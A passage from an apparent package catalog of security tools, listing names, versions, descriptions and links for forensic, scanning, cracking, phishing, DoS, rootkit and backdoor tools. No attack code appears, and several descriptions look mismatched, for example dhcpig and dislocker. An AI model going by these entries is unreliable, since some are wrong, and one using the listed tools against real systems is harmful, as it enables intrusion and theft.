http://www.cqure.net/wp/dbpwaudit/ * __dc3dd 7.1.614__ A patched version of dd that includes a number of features useful for computer forensics http://sourceforge.net/projects/dc3dd * __dcfldd 1.3.4.1__ DCFL (DoD Computer Forensics Lab) dd replacement with hashing http://dcfldd.sourceforge.net/ * __ddrescue 1.19__ GNU data recovery tool http://www.gnu.org/software/ddrescue/ddrescue.html * __deblaze 0.3__ A remote method enumeration tool for flex servers http://deblaze-tool.appspot.com/ * __delldrac 0.1a__ DellDRAC and Dell Chassis Discovery and Brute Forcer. https://www.trustedsec.com/september/owning-dell-drac-awesome-hack/ * __depant 0.3a__ Check network for services with default passwords. http://midnightresearch.com/projects/depant/ * __device-pharmer__ 35.c1d449e Opens 1K+ IPs or Shodan search results and attempts to login. https://github.com/DanMcInerney/device-pharmer * __dex2jar 0.0.9.13__ A tool for converting Android's .dex format to Java's .class format http://code.google.com/p/dex2jar * __dff-scanner 1.1__ Tool for finding path of predictable resource locations. http://netsec.rs/70/tools.html * __dhcdrop 0.5__ Remove illegal dhcp servers with IP-pool underflow. Stable version http://www.netpatch.ru/dhcdrop.html * __dhcpig 69.cc4109a__ Enumerates hosts, subdomains, and emails from a given domain using google https://github.com/kamorin/DHCPig * __dinouml 0.9.5__ A network simulation tool, based on UML (User Mode Linux) that can simulate big Linux networks on a single PC http://kernel.embedromix.ro/us/ * __dirb 2.04__ A web content scanner, brute forceing for hidden files http://dirb.sourceforge.net/ * __dirbuster 1.0_RC1__ An application designed to brute force directories and files names on web/application servers http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project * __directorytraversalscan 1.0.1.0__ Detect directory traversal vulnerabilities in HTTP servers and web applications. http://sourceforge.net/projects/httpdirscan/ * __dirs3arch 119.6a3b68a__ HTTP(S) directory/file brute forcer. https://github.com/maurosoria/dirs3arch * __dirscanner 0.1__ This is a python script that scans webservers looking for administrative directories, php shells, and more. http://packetstormsecurity.com/files/117773/Directory-Scanner-Tool.html * __dislocker 0.3__ A tool to exploit the hash length extension attack in various hashing algorithms. With FUSE capabilities built in. http://www.hsc.fr/ressources/outils/dislocker/ * __dissector 1__ This code dissects the internal data structures in ELF files. It supports x86 and x86_64 archs and runs under Linux. http://packetstormsecurity.com/files/125972/Coloured-ELF-File-Dissector.html * __dissy 10__ A graphical frontend to the objdump disassembler for compiler-generated code. http://dissy.googlecode.com/ * __dizzy 0.8.2__ A Python based fuzzing framework with many features. http://www.c0decafe.de/ * __dmitry 1.3a__ Deepmagic Information Gathering Tool. Gathers information about hosts. It is able to gather possible subdomains, email addresses, and uptime information and run tcp port scans, whois lookups, and more. http://www.mor-pah.net/ * __dnmap 0.6__ The distributed nmap framework http://sourceforge.net/projects/dnmap/ * __dns-spoof 12.3918a10__ Yet another DNS spoof utility. https://github.com/maurotfilho/dns-spoof * __dns2geoip 0.1__ A simple python script that brute forces DNS and subsequently geolocates the found subdomains. http://packetstormsecurity.com/files/118036/DNS-GeoIP.html * __dns2tcp 0.5.2__ A tool for relaying TCP connections over DNS. http://www.hsc.fr/ressources/outils/dns2tcp/index.html.en * __dnsa 0.5__ DNSA is a dns security swiss army knife http://packetfactory.openwall.net/projects/dnsa/index.html * __dnsbf 0.2__ search for available domain names in an IP range http://code.google.com/p/dnsbf * __dnsbrute 2.b1dc84a__ Multi-theaded DNS bruteforcing, average speed 80 lookups/second with 40 threads. https://github.com/d4rkcat/dnsbrute * __dnschef 0.3__ A highly configurable DNS proxy for pentesters. http://thesprawl.org/projects/dnschef/ * __dnsdrdos 0.1__ Proof of concept code for distributed DNS reflection DoS http://nullsecurity.net/tools/dos.html * __dnsenum 1.2.4.1__ Script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results. http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=dnsenum * __dnsgoblin 0.1__ Nasty creature constantly searching for DNS servers. It uses standard dns querys and waits for the replies http://nullsecurity.net/tools/scanner.html * __dnsmap 0.30__ Passive DNS network mapper http://dnsmap.googlecode.com * __dnspredict 0.0.2__ DNS prediction http://johnny.ihackstuff.com * __dnsrecon 0.8.8__ Python script for enumeration of hosts, subdomains and emails from a given domain using google. https://github.com/darkoperator/dnsrecon * __dnsspider 0.5__ A very fast multithreaded bruteforcer of subdomains that leverages a wordlist and/or character permutation. http://nullsecurity.net/tools/scanner.html * __dnstracer 1.9__ Determines where a given DNS server gets its information from, and follows the chain of DNS servers http://www.mavetju.org/unix/dnstracer.php * __dnsutils 9.9.2.P2__ DNS utilities: dig host nslookup http://www.isc.org/software/bind/ * __dnswalk 2.0.2__ A DNS debugger http://sourceforge.net/projects/dnswalk/ * __domain-analyzer 0.8.1__ Finds all the security information for a given domain name. http://sourceforge.net/projects/domainanalyzer/ * __doona 118.ff1e17b__ A fork of the Bruteforce Exploit Detector Tool (BED). https://github.com/wireghoul/doona * __dotdotpwn 3.0__ The Transversal Directory Fuzzer http://dotdotpwn.blogspot.com * __dpeparser beta002__ Default password enumeration project http://www.toolswatch.org/dpe/ * __dpscan 0.1__ Drupal Vulnerabilty Scanner. https://github.com/insaneisnotfree/Blue-Sky-Information-Security * __dradis 2.9.0__ An open source framework to enable effective information sharing. http://dradisframework.org/ * __driftnet 0.1.6__ Listens to network traffic and picks out images from TCP streams it observes. http://www.ex-parrot.com/~chris/driftnet/ * ___dripper v1.r1.gc9bb0c9__ A fast, asynchronous DNS scanner; it can be used for enumerating subdomains and enumerating boxes via reverse DNS. http://www.blackhatlibrary.net/Dripper * __dscanner 709.f00026f__ Swiss-army knife for D source code. https://github.com/Hackerpilot/Dscanner * __dsd 84.60807e0__ Digital Speech Decoder https://github.com/szechyjs/dsd * __dsniff 2.4b1__ Collection of tools for network auditing and penetration testing http://www.monkey.org/~dugsong/dsniff/ * __dumb0 19.1493e74__ A simple tool to dump users in popular forums and CMS. https://github.com/0verl0ad/Dumb0 * __dump1090 386.bff92c4__ A simple Mode S decoder for RTLSDR devices. https://github.com/MalcolmRobb/dump1090 * __dumpacl 0.0__ Dumps NTs ACLs and audit settings. http://www.systemtools.com/cgi-bin/download.pl?DumpAcl * __dumpzilla 03152013__ A forensic tool for firefox. http://www.dumpzilla.org/ * __eapmd5pass 1.4__ An implementation of an offline dictionary attack against the EAP-MD5 protocol http://www.willhackforsushi.com/?page_id=67 * __easy-creds 3.9 A__ bash script that leverages ettercap and other tools to obtain credentials. https://github.com/brav0hax/easy-creds * __easyfuzzer 3.6__ A flexible fuzzer, not only for web, has a CSV output for efficient output analysis (platform independant). http://www.mh-sec.de/downloads.html.en * __eazy 0.1__ This is a small python tool that scans websites to look for PHP shells, backups, admin panels, and more. http://packetstormsecurity.com/files/117572/EAZY-Web-Scanner.html * __edb 0.9.20__ A QT4-based binary mode debugger with the goal of having usability on par with OllyDbg. http://www.codef00.com/projects.php#Debugger * __eindeutig 20050628_1__ Examine the contents of Outlook Express DBX email repository files (forensic purposes) http://www.jonesdykstra.com/ * __elettra 1.0__ Encryption utility by Julia Identity http://www.winstonsmith.info/julia/elettra/ * __elettra-gui 1.0__ Gui for the elettra crypto application. http://www.winstonsmith.info/julia/elettra/ * __elite-proxy-finder 42.b92f75a__ Finds public elite anonymity proxies and concurrently tests them. https://github.com/DanMcInerney/elite-proxy-finder * __enabler 1__ attempts to find the enable password on a cisco system via brute force. http://packetstormsecurity.org/cisco/enabler.c * __encodeshellcode 0.1b__ This is an encoding tool for 32-bit x86 shellcode that assists a researcher when dealing with character filter or byte restrictions in a buffer overflow vulnerability or some kind of IDS/IPS/AV blocking your code. http://packetstormsecurity.com/files/119904/Encode-Shellcode.1b.html * __ent 1.0__ Pseudorandom number sequence test. http://www.fourmilab.ch/random * __enum-shares 7.97cba5a__ Tool that enumerates shared folders across the network and under a custom user account. https://github.com/dejanlevaja/enum_shares * __enum4linux 0.8.9__ A tool for enumerating information from Windows and Samba systems. http://labs.portcullis.co.uk/application/enum4linux/ * __enumiax 1.0__ IAX enumerator http://sourceforge.net/projects/enumiax/ * __enyelkm 1.2__ Rootkit for Linux x86 kernels v2.6. http://www.enye-sec.org/programas.html * __epicwebhoneypot 2.0a__ Tool which aims to lure attackers using various types of web vulnerability scanners by tricking them into believing that they have found a vulnerability on a host. http://sourceforge.net/projects/epicwebhoneypot/ * __erase-registrations 1.0__ IAX flooder http://www.hackingexposedvoip.com/ * __etherape 0.9.13__ A graphical network monitor for various OSI layers and protocols http://etherape.sourceforge.net/ * __ettercap 0.8.1__ A network sniffer/interceptor/logger for ethernet LANs - console http://ettercap.github.com/ettercap/ * __evilgrade 2.0.0__ Modular framework that takes advantage of poor upgrade implementations by injecting fake updates http://www.infobyte.com.ar/developments.html * __evilmaid 1.01__ TrueCrypt loader backdoor to sniff volume password http://theinvisiblethings.blogspot.com * __exiv2 0.24__ Exif and Iptc metadata manipulation library and tools http://exiv2.org * __exploit-db 1.6__ The Exploit Database (EDB) – an ultimate archive of exploits and vulnerable software - A collection of hacks http://www.exploit-db.com * __extracthosts 14.ec8b89c__ Extracts hosts (IP/Hostnames) from files. https://github.com/bwall/ExtractHosts * __extundelete 0.2.4__ Utility for recovering deleted files from ext2, ext3 or ext4 partitions by parsing the journal http://extundelete.sourceforge.net * __eyepwn 1.0__ Exploit for Eye-Fi Helper directory traversal vulnerability http://www.pentest.co.uk * __eyewitness 278.e72c21e__ Designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://github.com/ChrisTruncer/EyeWitness * __facebot 23.57f6025__ A facebook profile and reconnaissance system. https://github.com/pun1sh3r/facebot * __facebrute 7.ece355b__ This script tries to guess passwords for a given facebook account using a list of passwords (dictionary). https://github.com/emerinohdz/FaceBrute * __fakeap 0.3.2__ Black Alchemy's Fake AP generates thousands of counterfeit 802.11b access points. Hide in plain sight amongst Fake AP's cacophony of beacon frames. http://www.blackalchemy.to/project/fakeap/ * __fakedns 17.87d4216__ A regular-expression based python MITM DNS server with correct DNS request passthrough and "Not Found" responses. https://github.com/Crypt0s/FakeDns * __fakemail 1.0__ Fake mail server that captures e-mails as files for acceptance testing. http://sourceforge.net/projects/fakemail/ * __fakenetbios 7.b83701e__ A family of tools designed to simulate Windows hosts (NetBIOS) on a LAN. https://github.com/mubix/FakeNetBIOS * __fang 1.2__ A multi service threaded MD5 cracker. https://github.com/evilsocket/fang * __fbht r12.a284878__ A Facebook Hacking Tool https://github.com/chinoogawa/fbht-linux * __fcrackzip 1.0__ Zip file password cracker http://oldhome.schmorp.de/marc/fcrackzip.html * __fern-wifi-cracker 219__ WEP, WPA wifi cracker for wireless penetration testing http://code.google.com/p/fern-wifi-cracker/ * __fernmelder 6.c6d4ebe__ Asynchronous mass DNS scanner. https://github.com/stealth/fernmelder * __fgscanner 11.893372c__ An advanced, opensource URL scanner. http://www.fantaghost.com/fgscanner * __fhttp 1.3__ This is a framework for HTTP related attacks. It is written in Perl with a GTK interface, has a proxy for debugging and manipulation, proxy chaining, evasion rules, and more. http://packetstormsecurity.com/files/104315/FHTTP-Attack-Tool.3.html * __fierce 0.9.9__ A DNS scanner http://ha.ckers.org/fierce/ * __fiked 0.0.5__ Fake IDE daemon http://www.roe.ch/FakeIKEd * __filibuster 161.37b7f9c__ A Egress filter mapping application with additional functionality. https://github.com/subinacls/Filibuster * __fimap 1.00__ A little tool for local and remote file inclusion auditing and exploitation http://code.google.com/p/fimap/ * __findmyhash 1.1.2__ Crack different types of hashes using free online services http://code.google.com/p/findmyhash/ * __firewalk 5.0__ An active reconnaissance network security tool http://packetfactory.openwall.net/projects/firewalk/ * __firmware-mod-kit 099__ Modify firmware images without recompiling! http://code.google.com/p/firmware-mod-kit * __firstexecution 6.a275793__ A Collection of different ways to execute code outside of the expected entry points. https://github.com/nccgroup/firstexecution * __fl0p 0.1__ A passive L7 flow fingerprinter that examines TCP/UDP/ICMP packet sequences, can peek into cryptographic tunnels, can tell human beings and robots apart, and performs a couple of other infosec-related tricks. http://lcamtuf.coredump.cx/ * __flare 0.6__ Flare processes an SWF and extracts all scripts from it. http://www.nowrap.de/flare.html * __flasm 1.62__ Disassembler tool for SWF bytecode http://www.nowrap.de/flasm.html * __flawfinder 1.31__ Searches through source code for potential security flaws. http://www.dwheeler.com/flawfinder * __flowinspect 94.01c8921__ A network traffic inspection tool. https://github.com/7h3rAm/flowinspect * __flunym0us 2.0__ A Vulnerability Scanner for Wordpress and Moodle. http://code.google.com/p/flunym0us/ * __foremost 1.5.7__ A console program to recover files based on their headers, footers, and internal data structures http://foremost.sourceforge.net/ * __fpdns 0.9.3__ Program that remotely determines DNS server versions http://code.google.com/p/fpdns/ * __fping 3.10__ A utility to ping multiple hosts at once http://www.fping.org/ * __fport 2.0__ Identify unknown open ports and their associated applications. http://www.foundstone.com/us/resources/proddesc/fport.htm * __fraud-bridge 10.775c563__ ICMP and DNS tunneling via IPv4 and IPv6. https://github.com/stealth/fraud-bridge * __freeipmi 1.4.5__ Sensor monitoring, system event monitoring, power control, and serial-over-LAN (SOL). http://www.gnu.org/software/freeipmi/ * __freeradius 3.0.4__ The premier open source RADIUS server http://www.freeradius.org/ * __frisbeelite 1.2__ A GUI-based USB device fuzzer. https://github.com/nccgroup/FrisbeeLite * __fs-nyarl 1.0__ A network takeover & forensic analysis tool - useful to advanced PenTest tasks & for fun and profit. http://www.fulgursecurity.com/en/content/fs-nyarl * __fsnoop 3.3__ A tool to monitor file operations on GNU/Linux systems by using the Inotify mechanism. Its primary purpose is to help detecting file race condition vulnerabilities and since version 3, to exploit them with loadable DSO modules (also called "payload modules" or "paymods"). http://vladz.devzero.fr/fsnoop.php * __fstealer 0.1__ Automates file system mirroring through remote file disclosur vulnerabilities on Linux machines. http://packetstormsecurity.com/files/106450/FStealer-Filesystem-Mirroring-Tool.html * __ftester 1.0__ A tool designed for testing firewall filtering policies and Intrusion Detection System (IDS) capabilities. http://www.inversepath.com/ftester.html * __ftp-fuzz 1337__ The master of all master fuzzing scripts specifically targeted towards FTP server sofware http://nullsecurity.net/tools/fuzzer.html * __ftp-scanner 0.2.5__ Multithreaded ftp scanner/brute forcer. Tested on Linux, OpenBSD and Solaris. http://wayreth.eu.org/old_page/ * __ftp-spider 1.0__ FTP investigation tool - Scans ftp server for the following: reveal entire directory tree structures, detect anonymous access, detect directories with write permissions, find user specified data within repository. http://packetstormsecurity.com/files/35120/ftp-spider.pl.html * __ftpmap 0.4__ scans remote FTP servers to identify what software and what versions they are running. http://wcoserver.googlecode.com/files/ * __fusil 1.4__ Fusil the fuzzer is a Python library used to write fuzzing programs. It helps to start process with a prepared environment (limit memory, environment variables, redirect stdout, etc.), start network client or server, and create mangled files http://bitbucket.org/haypo/fusil/wiki/Home * __fuzzap 14.f13932c__ A python script for obfuscating wireless networks. https://github.com/lostincynicism/FuzzAP * __fuzzball2 0.7__ A little fuzzer for TCP and IP options. It sends a bunch of more or less bogus packets to the host of your choice. http://nologin.org/ * __fuzzdb 1.09__ Attack and Discovery Pattern Database for Application Fuzz Testing https://code.google.com/p/fuzzdb/ * __fuzzdiff 1.0__ A simple tool designed to help out with crash analysis during fuzz testing. It selectively 'un-fuzzes' portions of a fuzzed file that is known to cause a crash, re-launches the targeted application, and sees if it still crashes. http://vsecurity.com/resources/tool * __fuzztalk 1.0.0.0__ An XML driven fuzz testing framework that emphasizes easy extensibility and reusability. https://code.google.com/p/fuzztalk * __g72x++ 1__ Decoder for the g72x++ codec. http://www.ps-auxw.de/ * __galleta 20040505_1__ Examine the contents of the IE's cookie files for forensic purposes http://www.jonesdykstra.com/ * __gdb 7.8.1__ The GNU Debugger http://www.gnu.org/software/gdb/ * __genlist 0.1__ Generates lists of IP addresses. * __geoedge 0.2__ This little tools is designed to get geolocalization information of a host, it get the information from two sources (maxmind and geoiptool). * __geoip 1.6.2__ Non-DNS IP-to-country resolver C library & utils http://www.maxmind.com/app/c * __geoipgen 0.4__ GeoIPgen is a country to IP addresses generator. http://code.google.com/p/geoipgen/ * __getsids 0.0.1__ Getsids tries to enumerate Oracle Sids by sending the services command to the Oracle TNS listener. Like doing ‘lsnrctl service’. http://www.cqure.net/wp/getsids/ * __gggooglescan 0.4__ A Google scraper which performs automated searches and returns results of search queries in the form of URLs or hostnames. http://www.morningstarsecurity.com/research/gggooglescan * __ghettotooth 1.0__ Ghettodriving for bluetooth http://www.oldskoolphreak.com/tfiles/ghettotooth.txt * __ghost-phisher 1.62__ GUI suite for phishing and penetration attacks http://code.google.com/p/ghost-phisher * __ghost-py 0.1b3__ Webkit based webclient (relies on PyQT). http://jeanphix.github.com/Ghost.py/ * __giskismet 20110805__ A program to visually represent the Kismet data in a flexible manner. http://www.giskismet.org * __gnuradio 3.7.5.1__ General purpose DSP and SDR toolkit. With drivers for usrp and fcd. http://gnuradio.org * __gnutls2 2.12.23__ A library which provides a secure layer over a reliable transport layer (Version 2) http://gnutls.org/ * __goldeneye 16.7a38fe9__ A HTTP DoS test tool. Attack Vector exploited: HTTP Keep Alive + NoCache. https://github.com/jseidl/GoldenEye * __golismero 2.0__ Opensource web security testing framework. https://github.com/golismero/golismero * __goodork 2.2__ A python script designed to allow you to leverage the power of google dorking straight from the comfort of your command line. http://goo-dork.blogspot.com/ * __goofile 1.5__ Command line filetype search https://code.google.com/p/goofile/ * __goog-mail 1.0__ Enumerate domain emails from google. http://www.darkc0de.com/others/goog-mail.py * __googlesub 1.2__ A python script to find domains by using google dorks. https://github.com/zombiesam/googlesub * __gooscan 1.0.9__ A tool that automates queries against Google search appliances, but with a twist. http://johnny.ihackstuff.com/downloads/task,doc_details&Itemid=/gid,28/ * __gqrx 2.3.1__ Interactive SDR receiver waterfall for many devices. http://gqrx.dk/ * __grabber 0.1__ A web application scanner. Basically it detects some kind of vulnerabilities in your website. http://rgaucher.info/beta/grabber/ * __grepforrfi 0.1__ Simple script for parsing web logs for RFIs and Webshells v1.2 http://www.irongeek.com/downloads/grepforrfi.txt * __grokevt 0.5.0__ A collection of scripts built for reading Windows® NT/2K/XP/2K eventlog files. http://code.google.com/p/grokevt/ * __gtalk-decode 0.1__ Google Talk decoder tool that demonstrates recovering passwords from accounts. http://packetstormsecurity.com/files/119154/Google-Talk-Decoder.html * __gtp-scan 0.7__ A small python script that scans for GTP (GPRS tunneling protocol) speaking hosts. http://www.c0decafe.de/ * __guymager 0.7.4__ A forensic imager for media acquisition. http://guymager.sourceforge.net/ * __gwcheck 0.1__ A simple program that checks if a host in an ethernet network is a gateway to Internet. http://packetstormsecurity.com/files/62047/gwcheck.c.html * __gwtenum 7.f27a5aa__ Enumeration of GWT-RCP method calls. http://www.gdssecurity.com/l/t/d.php?k=GwtEnum * __hackersh 0.2.0__ A shell for with Pythonect-like syntax, including wrappers for commonly used security tools http://www.hackersh.org/ * __halberd 0.2.4__ Halberd discovers HTTP load balancers. It is useful for web application security auditing and for load balancer configuration testing. http://halberd.superadditive.com/ * __halcyon 0.1__ A repository crawler that runs checksums for static files found within a given git repository. http://www.blackhatlibrary.net/Halcyon * __hamster 2.0.0__ Tool for HTTP session sidejacking. http://hamster.erratasec.com/ * __handle 0.0__ An small application designed to analyze your system searching for global objects related to running proccess and display information for every found object, like tokens, semaphores, ports, files,.. http://www.tarasco.org/security/handle/index.html * __hasere 1.0__ Discover the vhosts using google and bing. https://github.com/galkan/hasere * __hash-identifier 1.1__ Identifies the different types of hashes used to encrypt data, especially passwords http://code.google.com/p/hash-identifier * __hashcat 0.47__ A multithreaded cross platform hash cracker. http://hashcat.net/hashcat/ * ___hashcat-utils 1.0__ Utilites for Hashcat http://hashcat.net/wiki/doku.php?id=hashcat_utils * __hasher 32.e9d1394__ A tool that allows you to quickly hash plaintext strings, or compare hashed values with a plaintext locally. https://github.com/ChrisTruncer/Hasher * __hashid 2.6.0__ Software to identify the different types of hashes used to encrypt data https://github.com/psypanda/hashID * __hashpump 34.0b3c286__ A tool to exploit the hash length extension attack in various hashing algorithms. https://github.com/bwall/HashPump * __hashtag 0.41__ A python script written to parse and identify password hashes. https://github.com/SmeegeSec/HashTag * __haystack 1035.ac2ffa4__ A Python framework for finding C structures from process memory - heap analysis - Memory structures forensics. https://github.com/trolldbois/python-haystack * __hbad 1.0__ This tool allows you to test clients on the heartbleed bug. http://www.curesec.com/ * __hcraft 1.0.0__ HTTP Vuln Request Crafter http://sourceforge.net/projects/hcraft/ * __hdcp-genkey 18.e8d342d__ Generate HDCP source and sink keys from the leaked master key. https://github.com/rjw57/hdcp-genkey * __hdmi-sniff 5.f7fbc0e__ HDMI DDC (I2C) inspection tool. It is designed to demonstrate just how easy it is to recover HDCP crypto keys from HDMI devices. https://github.com/ApertureLabsLtd/hdmi-sniff * __heartbleed-honeypot 0.1__ Script that listens on TCP port 443 and responds with completely bogus SSL heartbeat responses, unless it detects the start of a byte pattern similar to that used in Jared Stafford's http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt * __hex2bin 1.0.7__ Converts Motorola and Intel hex files to binary. http://hex2bin.sourceforge.net/ * __hexinject 1.5__ A very versatile packet injector and sniffer that provides a command-line framework for raw network access. http://hexinject.sourceforge.net * __hexorbase 6__ A database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). https://code.google.com/p/hexorbase/ * __hharp 1beta__ This tool can perform man-in-the-middle and switch flooding attacks. It has 4 major functions, 3 of which attempt to man-in-the-middle one or more computers on a network with a passive method or flood type method. http://packetstormsecurity.com/files/81368/Hackers-Hideaway-ARP-Attack-Tool.html * __hidattack 0.1__ HID Attack (attacking HID host implementations) http://mulliner.org/bluetooth/hidattack.php * __honeyd 1.6.7__ A small daemon that creates virtual hosts on a network. https://github.com/DataSoft/Honeyd/ * __honssh 47.0de60ec__ A high-interaction Honey Pot solution designed to log all SSH communications between a client and server. https://code.google.com/p/honssh/ * __hookanalyser 3.0__ A hook tool which can be potentially helpful in reversing applications and analyzing malware. It can hook to an API in a process and search for a pattern in memory or dump the buffer. http://hookanalyser.blogspot.de/ * __host-extract 9__ Ruby script tries to extract all IP/Host patterns in page response of a given URL and JavaScript/CSS files of that URL. https://code.google.com/p/host-extract/ * __hostbox-ssh 0.1.1__ A ssh password/account scanner. http://stridsmanit.wordpress.com/2012/12/02/brute-forcing-passwords-with-hostbox-ssh-1-1/ * __hotpatch 0.2__ Hot patches executables on Linux using .so file injection http://www.selectiveintellect.com/hotpatch.html * __hotspotter 0.4___ Hotspotter passively monitors the network for probe request frames to identify the preferred networks of Windows XP clients, and will compare it to a supplied list of common hotspot network names. http://www.remote-exploit.org/?page_id=418 * __hpfeeds__ 138.249b2f7 Honeynet Project generic authenticated datafeed protocol. https://github.com/rep/hpfeeds * __hping 3.0.0__ A command-line oriented TCP/IP packet assembler/analyzer. http://www.hping.org * __hqlmap 35.081395e__ A tool to exploit HQL Injections. https://github.com/PaulSec/HQLmap * __htexploit 0.77__ A Python script that exploits a weakness in the way that .htaccess files can be configured to protect a web directory with an authentication process http://www.mkit.com.ar/labs/htexploit/ * __htrosbif 134.9dc3f86__ Active HTTP server fingerprinting and recon tool. https://github.com/lkarsten/htrosbif * __htshells 760b5e9__ Self contained web shells and other attacks via .htaccess files. https://github.com/wireghoul/htshells * __http-enum 0.3__ A tool to enumerate the enabled HTTP methods supported on a webserver. https://www.thexero.co.uk/tools/http-enum/ * __http-fuzz 0.1__ A simple http fuzzer. none * __http-put 1.0__ Simple http put perl script * __http-traceroute 0.5__ This is a python script that uses the Max-Forwards header in HTTP and SIP to perform a traceroute-like scanning functionality. http://packetstormsecurity.com/files/107167/Traceroute-Like-HTTP-Scanner.html * __httpbog 1.0.0.0__ A slow HTTP denial-of-service tool that works similarly to other attacks, but rather than leveraging request headers or POST data Bog consumes sockets by slowly reading responses. http://sourceforge.net/projects/httpbog/ * __httpforge 11.02.01__ A set of shell tools that let you manipulate, send, receive, and analyze HTTP messages. These tools can be used to test, discover, and assert the security of Web servers, apps, and sites. An accompanying Python library is available for extensions. http://packetstormsecurity.com/files/98109/HTTPForge.02.01.html * __httping 2.3.4__ A 'ping'-like tool for http-requests. http://www.vanheusden.com/httping/ * __httprint 301__ A web server fingerprinting tool. http://www.net-square.com/httprint.html * __httprint-win32__ 301 A web server fingerprinting tool (Windows binaries). http://net-square.com/httprint * __httpry 0.1.8__ A specialized packet sniffer designed for displaying and logging HTTP traffic. http://dumpsterventures.com/jason/httpry/ * __httpsniff 0.4__ Tool to sniff HTTP responses from TCP/IP based networks and save contained files locally for later review. http://www.sump.org/projects/httpsniff/ * __httpsscanner 1.2__ A tool to test the strength of a SSL web server. https://code.google.com/p/libre-tools/ * __httptunnel 3.3__ Creates a bidirectional virtual data connection tunnelled in HTTP requests http://www.nocrew.org/software/httptunnel * __hulk 11.a9b9ad4__ A webserver DoS tool (Http Unbearable Load King) ported to Go with some additional features. https://github.com/grafov/hulk * __hwk 0.4__ Collection of packet crafting and wireless network flooding tools http://www.nullsecurity.net/ * __hydra 8.1__ A very fast network logon cracker which support many different services. http://www.thc.org/thc-hydra/ * __hyenae 0.36_1__ flexible platform independent packet generator http://sourceforge.net/projects/hyenae/ * __hyperion 1.1__ A runtime encrypter for 32-bit portable executables. http://nullsecurity.net/tools/binary.html * __iaxflood 0.1__ IAX flooder. http://www.hackingexposedvoip.com/ * __iaxscan 0.02__ A Python based scanner for detecting live IAX/2 hosts and then enumerating (by bruteforce) users on those hosts. http://code.google.com/p/iaxscan/ * __ibrute 12.3a6a11e__ An AppleID password bruteforce tool. It uses Find My Iphone service API, where bruteforce protection was not implemented. https://github.com/hackappcom/ibrute/ * __icmpquery 1.0__ Send and receive ICMP queries for address mask and current time. http://www.angio.net/security/ * __icmptx 0.01__ IP over ICMP http://thomer.com/icmptx/ * __iheartxor 0.01__ iheartxor is a tool for bruteforcing encoded strings within a boundary defined by a regular expression. It will bruteforce the key value range of 0x1 through 0x255. http://hooked-on-mnemonics.blogspot.com.es/p/iheartxor.html * __ike-scan 1.9__ A tool that uses IKE protocol to discover, fingerprint and test IPSec VPN servers http://www.nta-monitor.com/tools/ike-scan/ * __ikecrack 1.00__ An IKE/IPSec crack tool designed to perform Pre-Shared-Key analysis of RFC compliant aggressive mode authentication http://sourceforge.net/projects/ikecrack/ * __ikeprobe 0.1__ Determine vulnerabilities in the PSK implementation of the VPN server. http://www.ernw.de/download/ikeprobe.zip * __ikeprober 1.12__ Tool crafting IKE initiator packets and allowing many options to be manually set. Useful to find overflows, error conditions and identifiyng vendors http://ikecrack.sourceforge.net/ * __ilty 1.0__ An interception phone system for VoIP network. http://chdir.org/~nico/ilty/ * __imagejs 48.1faf262__ Small tool to package javascript into a valid image file. https://github.com/jklmnn/imagejs * __inception 416.2e7b723__ A FireWire physical memory manipulation and hacking tool exploiting IEEE 1394 SBP DMA. http://www.breaknenter.org/projects/inception/ * __indxparse 150.1b50750__ A Tool suite for inspecting NTFS artifacts. http://www.williballenthin.com/forensics/mft/indxparse/ * __inetsim 1.2.5__ A software suite for simulating common internet services in a lab environment, e.g. for analyzing the network behaviour of unknown malware samples. http://www.inetsim.org * __infip 0.1__ A python script that checks output from netstat against RBLs from Spamhaus. http://packetstormsecurity.com/files/104927/infIP.1-Blacklist-Checker.html * __inguma 0.1.1__ A free penetration testing and vulnerability discovery toolkit entirely written in python. Framework includes modules to discover hosts, gather information about, fuzz targets, brute force usernames and passwords, exploits, and a disassembler. http://inguma.sourceforge.net * __intercepter-ng 0.9.8__ A next generation sniffer including a lot of features: capturing passwords/hashes, sniffing chat messages, performing man-in-the-middle attacks, etc. http://intercepter.nerf.ru/#down * __interrogate 0.0.4__ A proof-of-concept tool for identification of cryptographic keys in binary material (regardless of target operating system), first and foremost for memory dump analysis and forensic usage. https://github.com/carmaa/interrogate * __intersect 2.5__ Post-exploitation framework https://github.com/ohdae/Intersect.5 * __intrace 1.5__ Traceroute-like application piggybacking on existing TCP connections http://intrace.googlecode.com * __inundator 0.5__ An ids evasion tool, used to anonymously inundate intrusion detection logs with false positives in order to obfuscate a real attack. http://inundator.sourceforge.net/ * __inviteflood 2.0__ Flood a device with INVITE requests https://launchpad.net/~wagungs/+archive/kali-linux/+build/4386635 * __iodine 0.7.0__ Tunnel IPv4 data through a DNS server http://code.kryo.se/iodine * __iosforensic 1.0__ iOS forensic tool https://www.owasp.org/index.php/Projects/OWASP_iOSForensic https://github.com/Flo354/iOSForensic * __ip-https-tools 5.b22e2b3__ Tools for the IP over HTTPS (IP-HTTPS) Tunneling Protocol. https://github.com/takeshixx/ip-https-tools * __ipaudit 1.0BETA2__ IPAudit monitors network activity on a network. http://ipaudit.sourceforge.net * __ipba2 032013__ IOS Backup Analyzer http://www.ipbackupanalyzer.com/ * __ipdecap 69.f3a08f6__ Can decapsulate traffic encapsulated within GRE, IPIP, 6in4, ESP (ipsec) protocols, and can also remove IEEE 802.1Q (virtual lan) header. http://www.loicp.eu/ipdecap#dependances * __iphoneanalyzer 2.1.0__ Allows you to forensically examine or recover date from in iOS device. http://www.crypticbit.com/zen/products/iphoneanalyzer * __ipscan 3.3.2__ Angry IP scanner is a very fast IP address and port scanner. http://www.angryziber.com/ * __iputils 20121221__ Network monitoring tools, including ping http://www.skbuff.net/iputils/ * __ipv6toolkit 2.0beta__ SI6 Networks' IPv6 Toolkit http://www.si6networks.com/tools/ipv6toolkit/ * __ircsnapshot 93.9ba3c6c__ Tool to gather information from IRC servers. https://github.com/bwall/ircsnapshot * __irpas 0.10__ Internetwork Routing Protocol Attack Suite. http://phenoelit-us.org/irpas * __isr-form 1.0__ Simple html parsing tool that extracts all form related information and generates reports of the data. Allows for quick analyzing of data. http://www.infobyte.com.ar/ * __jad 1.5.8e__ Java decompiler http://www.varaneckas.com/jad * __javasnoop 